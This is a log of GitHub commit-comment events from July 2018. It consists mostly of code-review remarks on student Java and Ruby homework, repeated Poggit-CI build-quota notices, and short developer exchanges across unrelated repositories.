{"id":"8034346057","type":"CommitCommentEvent","actor":{"login":"Stylite"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29875629,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T17:33:55Z","updated_at":"2018-07-29T17:33:55Z","author_association":"MEMBER","body":"That's no good"}},"created_at":"2018-07-29T17:33:55Z"}
{"id":"8034346299","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875630,"position":55,"line":55,"path":"src/com/itacademy/lesson9homeworkcollections/LerningCollections.java","commit_id":"5842a0fa0d54508fdacc481480a1289dfd477aad","created_at":"2018-07-29T17:34:06Z","updated_at":"2018-07-29T17:34:06Z","author_association":"NONE","body":"метод занимается двумя обязанностями - добавляет элементы и выводить на консоль! на консоль выводим только для тестов в мейне"}},"created_at":"2018-07-29T17:34:06Z"}
{"id":"8034346596","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875631,"position":15,"line":15,"path":"src/com/itacademy/lesson9homeworkcollections/FeeComporatorStudenSurName.java","commit_id":"4121f060c7878a87c13faa9cb7b8665156ad9320","created_at":"2018-07-29T17:34:18Z","updated_at":"2018-07-29T17:34:18Z","author_association":"NONE","body":"код не форматируешь!"}},"created_at":"2018-07-29T17:34:18Z"}
{"id":"8034346821","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875632,"position":15,"line":15,"path":"src/com/itacademy/lesson9homeworkcollections/FeeComporatorStudenSurName.java","commit_id":"4121f060c7878a87c13faa9cb7b8665156ad9320","created_at":"2018-07-29T17:34:28Z","updated_at":"2018-07-29T17:34:28Z","author_association":"NONE","body":"куча ненужных оступов в конце класса"}},"created_at":"2018-07-29T17:34:28Z"}
{"id":"8034347197","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/SimpleShopGUI"},"payload":{"comment":{"id":29875633,"position":null,"line":null,"path":null,"commit_id":"4186d7d0a340cef462d0fd8e58d4286c71a5c0a3","created_at":"2018-07-29T17:34:44Z","updated_at":"2018-07-29T17:34:44Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/SimpleShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ad16759e-9355-11e8-8584-0ed5050b38f7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:34:44Z"}
{"id":"8034347263","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875634,"position":31,"line":31,"path":"src/com/itacademy/lesson9homeworkcollections/FindStudent.java","commit_id":"4121f060c7878a87c13faa9cb7b8665156ad9320","created_at":"2018-07-29T17:34:47Z","updated_at":"2018-07-29T17:34:47Z","author_association":"NONE","body":"с помощью итератора надо было найти"}},"created_at":"2018-07-29T17:34:47Z"}
{"id":"8034347449","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875635,"position":35,"line":35,"path":"src/com/itacademy/lesson9homeworkcollections/FindStudent.java","commit_id":"4121f060c7878a87c13faa9cb7b8665156ad9320","created_at":"2018-07-29T17:34:56Z","updated_at":"2018-07-29T17:34:56Z","author_association":"NONE","body":"опять метод с двумя обязанностями"}},"created_at":"2018-07-29T17:34:56Z"}
{"id":"8034348097","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/SimpleShopGUI"},"payload":{"comment":{"id":29875637,"position":null,"line":null,"path":null,"commit_id":"be556d5c2a83f0a4dbe2474a247c2a1a6805a0aa","created_at":"2018-07-29T17:35:25Z","updated_at":"2018-07-29T17:35:25Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/SimpleShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c5b228d2-9355-11e8-95c1-749e703e3e86`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:35:25Z"}
{"id":"8034349054","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875650,"position":38,"line":38,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:35:59Z","updated_at":"2018-07-29T17:35:59Z","author_association":"NONE","body":"в этом методе и следующих двух похожая проблемма\r\nтвой код сейчас устанавливает индекс текущей станции для поезда, т.е. \"поезд знает на какой он станции\"\r\nно... \"станция про это ничего не знает\" (а она также должна быть осведомлена о прибытии поезда, у нее и методы есть для этого)"}},"created_at":"2018-07-29T17:35:59Z"}
{"id":"8034349178","type":"CommitCommentEvent","actor":{"login":"mostafanou7"},"repo":{"name":"CEA-LIST/Cingulata"},"payload":{"comment":{"id":29875651,"position":2,"line":5,"path":"README.md","commit_id":"8024873ed7db26c6074016a73bf3296974174fba","created_at":"2018-07-29T17:36:03Z","updated_at":"2018-07-29T17:36:03Z","author_association":"NONE","body":"Is this by any means related to the Armadillo obfuscation tool?\r\nSorry for that very naive question."}},"created_at":"2018-07-29T17:36:03Z"}
{"id":"8034349705","type":"CommitCommentEvent","actor":{"login":"jdschwam"},"repo":{"name":"jdschwam/abe25d8termtest2"},"payload":{"comment":{"id":29875653,"position":null,"line":null,"path":null,"commit_id":"c7a761816ac7ca3fef382d6ed009a3fedd4e9a24","created_at":"2018-07-29T17:36:27Z","updated_at":"2018-07-29T17:36:27Z","author_association":"OWNER","body":"Created multidev environment [abe25d8termtest2#ci-4](https://dashboard.pantheon.io/sites/4a1606c7-c8bb-4140-8a05-40cb043560c5#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-abe25d8termtest2.pantheonsite.io/)"}},"created_at":"2018-07-29T17:36:27Z"}
{"id":"8034350101","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29875659,"position":10,"line":10,"path":"sysutils/f3/Portfile","commit_id":"0fc76cb3454cd185b6a0fadec191aa77bf65fc12","created_at":"2018-07-29T17:36:44Z","updated_at":"2018-07-29T17:36:44Z","author_association":"CONTRIBUTOR","body":"https://github.com/macports/macports-guide/pull/18"}},"created_at":"2018-07-29T17:36:44Z"}
{"id":"8034350323","type":"CommitCommentEvent","actor":{"login":"aar026"},"repo":{"name":"aar026/aar026.github.io"},"payload":{"comment":{"id":29875662,"position":null,"line":null,"path":null,"commit_id":"6a77aa110eea227c766319988c0ce210dba0d753","created_at":"2018-07-29T17:36:55Z","updated_at":"2018-07-29T17:36:55Z","author_association":"OWNER","body":"This shouild have worked and fixed the anchors"}},"created_at":"2018-07-29T17:36:55Z"}
{"id":"8034350469","type":"CommitCommentEvent","actor":{"login":"jdschwam"},"repo":{"name":"jdschwam/bahsld8"},"payload":{"comment":{"id":29875663,"position":null,"line":null,"path":null,"commit_id":"b17c8f2c4e03a61977c854742bc7ec7ed131d206","created_at":"2018-07-29T17:37:01Z","updated_at":"2018-07-29T17:37:01Z","author_association":"OWNER","body":"Created multidev environment [bahsld8#ci-4](https://dashboard.pantheon.io/sites/599fee42-0ab6-40f5-8e6a-d2cdbda4ae8e#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-bahsld8.pantheonsite.io/)"}},"created_at":"2018-07-29T17:37:01Z"}
{"id":"8034351015","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875669,"position":46,"line":46,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:37:27Z","updated_at":"2018-07-29T17:37:27Z","author_association":"NONE","body":"общий недостаток методов `move_forward` и `move_back` в том, что они оба могут спустить поезд с рельсов...\r\nк примеру стоит поезд на последней станции маршрута, приходит команда \"на следующую\", поезд говорит \"яволь!\", покидает текущую станцию, заносит себе в бортовой журнал индекс несуществующей в маршруте станции и усе... \"ту-ту\"\r\nна вопрос \"каррент_стейшен\" он ругается, ни одна из станций также не признается, что он у них...\r\nушел в астрал..."}},"created_at":"2018-07-29T17:37:27Z"}
{"id":"8034351141","type":"CommitCommentEvent","actor":{"login":"marzuki81"},"repo":{"name":"Upstake/ups-smart-contract"},"payload":{"comment":{"id":29875670,"position":64,"line":64,"path":"token/CustomERC20.sol","commit_id":"076e99ee3edaf0b7b64787bad9b7479b4581c662","created_at":"2018-07-29T17:37:32Z","updated_at":"2018-07-29T17:37:32Z","author_association":"NONE","body":"0xCeb2500Ea09bc7301dfBe820A5D97c229ad5FB7a"}},"created_at":"2018-07-29T17:37:32Z"}
{"id":"8034351550","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875671,"position":2,"line":2,"path":"Lesson3/route.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:37:50Z","updated_at":"2018-07-29T17:37:50Z","author_association":"NONE","body":"лучше просто `stations`"}},"created_at":"2018-07-29T17:37:50Z"}
{"id":"8034351910","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875672,"position":2,"line":2,"path":"Lesson3/route.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:38:07Z","updated_at":"2018-07-29T17:38:07Z","author_association":"NONE","body":"лаконичней как-то"}},"created_at":"2018-07-29T17:38:07Z"}
{"id":"8034352577","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875674,"position":2,"line":2,"path":"Lesson3/station.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:38:34Z","updated_at":"2018-07-29T17:38:34Z","author_association":"NONE","body":"я бы рекомендовал просто `trains`"}},"created_at":"2018-07-29T17:38:34Z"}
{"id":"8034352619","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/SimpleShopGUI"},"payload":{"comment":{"id":29875675,"position":null,"line":null,"path":null,"commit_id":"2877e16961a85ffa3becd9d24fdf756f4c30ce5b","created_at":"2018-07-29T17:38:36Z","updated_at":"2018-07-29T17:38:36Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/SimpleShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `372e7b28-9356-11e8-9a2f-5302aaaa62cd`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:38:36Z"}
{"id":"8034352807","type":"CommitCommentEvent","actor":{"login":"andrygreen777"},"repo":{"name":"Carthage/Carthage"},"payload":{"comment":{"id":29875676,"position":7,"line":176,"path":"README.md","commit_id":"4e854b8e15955b60d5b17460f64f19ef6d3eae5b","created_at":"2018-07-29T17:38:46Z","updated_at":"2018-07-29T17:38:46Z","author_association":"NONE","body":"Hjkk"}},"created_at":"2018-07-29T17:38:46Z"}
{"id":"8034353450","type":"CommitCommentEvent","actor":{"login":"goetzc"},"repo":{"name":"input-output-hk/cardano-sl"},"payload":{"comment":{"id":29875679,"position":8,"line":60,"path":"docs/how-to/build-cardano-sl-and-daedalus-from-source-code.md","commit_id":"c631f6252c3d48456cdbdec468b16aff2d40ee8e","created_at":"2018-07-29T17:39:16Z","updated_at":"2018-07-29T17:39:16Z","author_association":"NONE","body":"This indentation change breaks the markdown!"}},"created_at":"2018-07-29T17:39:16Z"}
{"id":"8034354919","type":"CommitCommentEvent","actor":{"login":"CoffeeOne"},"repo":{"name":"gvreuls/Stockfish"},"payload":{"comment":{"id":29875683,"position":null,"line":null,"path":null,"commit_id":"6c4f168655bb5129f64098528731f9fa0199a9ff","created_at":"2018-07-29T17:40:18Z","updated_at":"2018-07-29T17:40:18Z","author_association":"NONE","body":"@locutus2 Sorry I should have checked before. Master of gvreuls is on latest, while version under test is derived from: https://github.com/official-stockfish/Stockfish/commit/6184d2b2ac25691dc171560903a81e6d38a0593a.\r\nIs there a chance to correct the bench of master without deleting the test?"}},"created_at":"2018-07-29T17:40:18Z"}
{"id":"8034354988","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/SimpleShopGUI"},"payload":{"comment":{"id":29875684,"position":null,"line":null,"path":null,"commit_id":"5690cbe397553774c9d6199836ccebb14dff99bc","created_at":"2018-07-29T17:40:21Z","updated_at":"2018-07-29T17:40:21Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/SimpleShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `7623a88a-9356-11e8-844e-4cb87936d4b0`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:40:21Z"}
{"id":"8034355579","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29875698,"position":null,"line":null,"path":null,"commit_id":"3a1b21df32f076c6ded279e4a7321388635ba0e9","created_at":"2018-07-29T17:40:48Z","updated_at":"2018-07-29T17:40:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [043 - Desenvolver Repository - Endereco](https://trello.com/c/zwIB8RSJ/49-043-desenvolver-repository-endereco)"}},"created_at":"2018-07-29T17:40:48Z"}
{"id":"8034357682","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875705,"position":32,"line":32,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:42:25Z","updated_at":"2018-07-29T17:42:25Z","author_association":"NONE","body":"ну да, ТЗ намеренно дается несколько \"неподробным\", чтобы студенты побольше самостоятельно размышляли над задачей и пробовали ее сами детализировать"}},"created_at":"2018-07-29T17:42:25Z"}
{"id":"8034358289","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/coins"},"payload":{"comment":{"id":29875707,"position":null,"line":null,"path":null,"commit_id":"1da1839f94a96a5c643e471f1ab15b7b37e6986d","created_at":"2018-07-29T17:42:52Z","updated_at":"2018-07-29T17:42:52Z","author_association":"OWNER","body":"It was copied from an NTFS partition, so retained its default properties"}},"created_at":"2018-07-29T17:42:52Z"}
{"id":"8034358831","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875709,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:43:14Z","updated_at":"2018-07-29T17:43:14Z","author_association":"CONTRIBUTOR","body":"haah jaaj"}},"created_at":"2018-07-29T17:43:14Z"}
{"id":"8034359174","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875710,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:43:27Z","updated_at":"2018-07-29T17:43:27Z","author_association":"CONTRIBUTOR","body":"@ich_iel Roboter#3651"}},"created_at":"2018-07-29T17:43:27Z"}
{"id":"8034359319","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875711,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:43:32Z","updated_at":"2018-07-29T17:43:32Z","author_association":"CONTRIBUTOR","body":"hm"}},"created_at":"2018-07-29T17:43:32Z"}
{"id":"8034359509","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875712,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:43:40Z","updated_at":"2018-07-29T17:43:40Z","author_association":"CONTRIBUTOR","body":"funktioniert nicht"}},"created_at":"2018-07-29T17:43:40Z"}
{"id":"8034359627","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875713,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:43:46Z","updated_at":"2018-07-29T17:43:46Z","author_association":"CONTRIBUTOR","body":"@TheLastZombie bitte fixen"}},"created_at":"2018-07-29T17:43:46Z"}
{"id":"8034360634","type":"CommitCommentEvent","actor":{"login":"tonykrikorian"},"repo":{"name":"tonykrikorian/udemy-heroes"},"payload":{"comment":{"id":29875716,"position":null,"line":null,"path":null,"commit_id":"1e87af453916fc1cb4cca047cc1478939c055681","created_at":"2018-07-29T17:44:30Z","updated_at":"2018-07-29T17:44:30Z","author_association":"OWNER","body":" Bien , los cambios funcionan perfectamente 👍 👍 "}},"created_at":"2018-07-29T17:44:30Z"}
{"id":"8034362559","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875735,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:46:01Z","updated_at":"2018-07-29T17:46:01Z","author_association":"OWNER","body":"bist du blöd.jpeg"}},"created_at":"2018-07-29T17:46:01Z"}
{"id":"8034363191","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29875737,"position":null,"line":null,"path":null,"commit_id":"5efc7db918f1513270c1f82eedfeaa5e1de952ea","created_at":"2018-07-29T17:46:29Z","updated_at":"2018-07-29T17:46:29Z","author_association":"NONE","body":"You should use for code consistency `pos.moved_piece(m)` like two lines later. Good luck!"}},"created_at":"2018-07-29T17:46:29Z"}
{"id":"8034363488","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875741,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:46:44Z","updated_at":"2018-07-29T17:46:44Z","author_association":"CONTRIBUTOR","body":"das ist ne png du blödkopf, außerdem heißt die datei blöd.png\r\n"}},"created_at":"2018-07-29T17:46:44Z"}
{"id":"8034364092","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29875744,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T17:47:12Z","updated_at":"2018-07-29T17:47:12Z","author_association":"CONTRIBUTOR","body":"That's no good"}},"created_at":"2018-07-29T17:47:12Z"}
{"id":"8034364180","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875745,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:47:15Z","updated_at":"2018-07-29T17:47:15Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/38357030/43369101-2ff941a0-9368-11e8-8ddc-76ebd4c6124d.png)\r\ntja"}},"created_at":"2018-07-29T17:47:15Z"}
{"id":"8034364489","type":"CommitCommentEvent","actor":{"login":"perryprog"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29875746,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T17:47:28Z","updated_at":"2018-07-29T17:47:28Z","author_association":"COLLABORATOR","body":"That's no good"}},"created_at":"2018-07-29T17:47:28Z"}
{"id":"8034366459","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":29875752,"position":null,"line":null,"path":null,"commit_id":"b1d620faa798559b443c42ea2e0c1074b7f19ad6","created_at":"2018-07-29T17:48:47Z","updated_at":"2018-07-29T17:48:47Z","author_association":"CONTRIBUTOR","body":"Don't forget the version update for Doxygen, Dokan.props and rc-file. I should really finish that old patchset that reads all versions from only one file..."}},"created_at":"2018-07-29T17:48:47Z"}
{"id":"8034366508","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875753,"position":51,"line":51,"path":"src/homeTasks/lesson7/closedFigures/Rectangle.java","commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T17:48:48Z","updated_at":"2018-07-29T17:48:48Z","author_association":"NONE","body":"не круто наследоваться квадрату от четырехугольника. У него достаются методы getSideB-setSideB, некорректное поведение получается, следовательно, неверно использовано наследование"}},"created_at":"2018-07-29T17:48:48Z"}
{"id":"8034368009","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875756,"position":3,"line":3,"path":"src/homeTasks/lesson7/Main.java","commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T17:49:52Z","updated_at":"2018-07-29T17:49:52Z","author_association":"NONE","body":"не использовать множественный импорт, не по код конвеншену. Исправить в настроках идеи, я показывал как"}},"created_at":"2018-07-29T17:49:52Z"}
{"id":"8034368144","type":"CommitCommentEvent","actor":{"login":"stevegomez17"},"repo":{"name":"semver/semver.org"},"payload":{"comment":{"id":29875757,"position":16,"line":42,"path":"lang/zh-CN/index.md","commit_id":"3426b499019e4b7ce5562c0c387c34f9d59e54c9","created_at":"2018-07-29T17:49:57Z","updated_at":"2018-07-29T17:49:57Z","author_association":"NONE","body":"ضضض"}},"created_at":"2018-07-29T17:49:57Z"}
{"id":"8034368588","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875758,"position":null,"line":null,"path":null,"commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T17:50:13Z","updated_at":"2018-07-29T17:50:13Z","author_association":"NONE","body":"не нашел у тебя класса ShapeUtils с необходимыми методами"}},"created_at":"2018-07-29T17:50:13Z"}
{"id":"8034368928","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/SimpleShopGUI"},"payload":{"comment":{"id":29875759,"position":null,"line":null,"path":null,"commit_id":"6120af60fe39a860889c80984c4a714e78556907","created_at":"2018-07-29T17:50:27Z","updated_at":"2018-07-29T17:50:27Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/SimpleShopGUI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `df1d08ee-9357-11e8-999d-0858a7f8ca69`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:50:27Z"}
{"id":"8034369001","type":"CommitCommentEvent","actor":{"login":"Pgsnikable"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875760,"position":51,"line":51,"path":"src/homeTasks/lesson7/closedFigures/Rectangle.java","commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T17:50:30Z","updated_at":"2018-07-29T17:50:30Z","author_association":"OWNER","body":"Квадрат наследуется от прямоугольника как частный случай (когда сторона равны). Все равно не ок?)\r\n"}},"created_at":"2018-07-29T17:50:30Z"}
{"id":"8034369191","type":"CommitCommentEvent","actor":{"login":"jcapellman"},"repo":{"name":"akashkw/practice"},"payload":{"comment":{"id":29875762,"position":null,"line":null,"path":null,"commit_id":"ee469f4497d404b51f5e710971f5ff60d62df174","created_at":"2018-07-29T17:50:37Z","updated_at":"2018-07-29T17:50:37Z","author_association":"NONE","body":"When you want to get fancy overload the << operator on ostream so you can effectively just say\r\n\r\ncout << arr;\r\n\r\nWithout having a print method :)"}},"created_at":"2018-07-29T17:50:37Z"}
{"id":"8034369291","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875763,"position":37,"line":37,"path":"src/homeTasks/lesson9/Task1.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:50:42Z","updated_at":"2018-07-29T17:50:42Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:50:42Z"}
{"id":"8034369460","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875768,"position":39,"line":39,"path":"src/homeTasks/lesson9/Task1.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:50:48Z","updated_at":"2018-07-29T17:50:48Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T17:50:48Z"}
